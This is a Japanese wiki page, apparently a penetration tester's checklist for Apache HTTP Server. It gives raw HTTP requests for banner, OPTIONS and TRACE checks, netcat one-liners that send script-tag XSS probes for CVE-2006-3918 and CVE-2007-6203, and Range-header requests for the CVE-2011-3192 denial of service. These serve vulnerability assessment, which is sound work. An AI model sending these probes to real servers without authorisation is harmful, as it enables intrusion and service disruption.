Apache HTTP Server チェック項目

バナー情報

HEAD / HTTP/1.0

使用可能なメソッド一覧

OPTIONS / HTTP/1.0

TRACEメソッドの有効/無効

TRACE / HTTP/1.0
TEST: TRACETEST

ExpectリクエストヘッダにおけるXSS (CVE-2006-3918)

  • Apache HTTP Server 1.3.34 およびそれ以前
  • Apache HTTP Server 2.0.55 およびそれ以前
  • Apache HTTP Server 2.2.0
  • エラーメッセージ内のscriptタグがエスケープされているかどうかで判別
# echo -en "GET / HTTP/1.0\nExpect: <script>alert("XSS");</script>\n\n" | nc www.example.co.jp 80

413エラーメッセージにおけるXSS (CVE-2007-6203)

  • Apache HTTP Server 2.0.62 およびそれ以前
  • Apache HTTP Server 2.2.7 およびそれ以前
  • エラーメッセージ内のscriptタグがエスケープされているかどうかで判別
# echo -en "<script>alert("XSS");</script> / HTTP/1.1\nContent-Length: 0\nContent-Length: 0\nHost: www.example.co.jp\n\n" | nc www.example.co.jp 80

Range Header DoS (CVE-2011-3192)

GET / HTTP/1.0
Range: bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10

GET / HTTP/1.0
Range: bytes=0-,1-
  • Apache HTTP Server 2.2.21 およびそれ以前
  • レスポンスの<pre>タグ内の文字数で判別
GET / HTTP/1.0
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx|before2_2_21
pt-pf/apache.txt · 最終更新: 2013/02/25 07:16 by kikuzou
 
特に明示されていない限り、本Wikiの内容は次のライセンスに従います: CC Attribution-Share Alike 4.0 International
Recent changes RSS feed Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki